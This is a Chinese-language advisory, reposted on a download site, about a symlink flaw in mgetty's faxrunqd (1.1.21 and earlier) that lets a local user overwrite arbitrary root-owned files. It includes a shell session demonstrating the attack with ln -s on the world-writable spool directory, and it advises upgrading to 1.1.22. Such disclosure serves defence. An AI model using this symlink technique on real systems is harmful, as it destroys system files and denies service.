IT貓撲網(wǎng):您身邊最放心的安全下載站! 最新更新|軟件分類|軟件專題|手機(jī)版|論壇轉(zhuǎn)貼|軟件發(fā)布

您當(dāng)前所在位置:首頁系統(tǒng)集成網(wǎng)絡(luò)故障 → Linux faxrunqd文件創(chuàng)建問題導(dǎo)致拒絕服務(wù)攻擊

Linux faxrunqd文件創(chuàng)建問題導(dǎo)致拒絕服務(wù)攻擊

時(shí)間:2015/6/28來源:IT貓撲網(wǎng)作者:網(wǎng)管聯(lián)盟我要評論(0)

  受影響系統(tǒng):

  mgetty 1.1.21以及更低版本

  - Linux redhat 6.2以及更低版本

  - Linux-Mandrake 7.1 以及更低版本

  - 其他使用有問題mgetty的unix系統(tǒng)

  不受影響系統(tǒng):

  mgetty 1.1.22

  描述:

  mgetty中帶了一個(gè)faxrunqd程序,它用來發(fā)送faxspool(1)產(chǎn)生的傳真隊(duì)列中的任務(wù)。

  在執(zhí)行時(shí),該程序會(huì)在/var/spool/outgoing/目錄下創(chuàng)建一個(gè).last_run文件,這個(gè)目錄是任何人可寫的。在某些mgetty版本中所帶的faxrunqd沒有檢查該文件是否存在或是鏈接文件,因此攻擊者可能覆蓋任意系統(tǒng)文件,造成拒絕服務(wù)攻擊。

  <* 來源: Stan Bubrouski ([email protected])*>

  測試方法:

  警 告

  以下程序(方法)可能帶有攻擊性,僅供安全研究與教學(xué)之用。使用者風(fēng)險(xiǎn)自負(fù)!

  [user@king /tmp]$ id

  uid=200(user) gid=100(users) groups=100(users)

  [user@king /tmp]$ ls -al /var/spool/fax/outgoing

  total 3

  drwxrwxrwt 3 root root 1024 Jun 2 18:46 .

  drwxr-xr-x 4 root root 1024 Jun 2 18:46 ..

  drwxrwxrwx 2 root root 1024 Jun 1 00:47 locks

  [user@king /tmp]$ ls -al /etc/smash_me

  -rw-r--r-- 1 root root 12 Jun 2 18:45 /etc/smash_me

  [user@king /tmp]$ cat /etc/smash_me

  Smash me!!!

  [user@king /tmp]$ ln -s /etc/smash_me /var/spool/fax/outgoing/.last_run

  [user@king /tmp]$ ls -al /var/spool/fax/outgoing

  total 3

  drwxrwxrwt 3 root root 1024 Jun 2 18:48 .

  drwxr-xr-x 4 root root 1024 Jun 2 18:46 ..

  lrwxrwxrwx 1 user users 13 Jun 2 18:48 .last_run ->

  /etc/smash_me

  drwxrwxrwx 2 root root 1024 Jun 1 00:47 locks

  Root console:

  [root@king /tmp]# faxrunqd -l ttyS0

  ...

  Remote unprivilaged user:

  [user@king /tmp]$ ls -al /var/spool/fax/outgoing

  total 3

  drwxrwxrwt 3 root root 1024 Jun 2 18:48 .

  drwxr-xr-x 4 root root 1024 Jun 2 18:48 ..

  lrwxrwxrwx 1 user users 13 Jun 2 18:48 .last_run ->

  /etc/smash_me

  drwxrwxrwx 2 root root 1024 Jun 1 00:47 locks

  [user@king /tmp]$ ls -al /etc/smash_me

  -rw-r--r-- 1 root root 44 Jun 2 18:48 /etc/smash_me

  [user@king /tmp]$ cat /etc/smash_me

  Fri Jun 2 18:48:47 2000 /usr/sbin/faxrunqd

  建議:

  mgetty 1.1.22已經(jīng)解決了這個(gè)問題,您可以在下列地址下載:https://alpha.greenie.net/mgetty/

關(guān)鍵詞標(biāo)簽:拒絕服務(wù)攻擊,Linux,f

相關(guān)閱讀

文章評論
發(fā)表評論

熱門文章 提示dns服務(wù)錯(cuò)誤怎么辦 dns錯(cuò)誤問題多種解決提示dns服務(wù)錯(cuò)誤怎么辦 dns錯(cuò)誤問題多種解決IS-IS同時(shí)下發(fā)缺省路由出現(xiàn)路由環(huán)路問題的解IS-IS同時(shí)下發(fā)缺省路由出現(xiàn)路由環(huán)路問題的解IBGP鄰居無法建立連接問題的解決方法IBGP鄰居無法建立連接問題的解決方法對稱結(jié)構(gòu)承載網(wǎng)流量出現(xiàn)異常問題的故障解決對稱結(jié)構(gòu)承載網(wǎng)流量出現(xiàn)異常問題的故障解決

相關(guān)下載

人氣排行 光纖上網(wǎng) 路由器設(shè)置頁面進(jìn)不去怎么辦登錄SSH服務(wù)器失敗問題的分析及解決無線網(wǎng)卡連接不上怎么辦_無線網(wǎng)卡連接不上解決方法提示dns服務(wù)錯(cuò)誤怎么辦 dns錯(cuò)誤問題多種解決方法本機(jī)IP設(shè)置不當(dāng)造成路由異常故障分析路由設(shè)置不當(dāng) 導(dǎo)致VPN無法訪問外網(wǎng)無線路由器無不能上網(wǎng)的秘密ADSL頻繁掉線如何解決?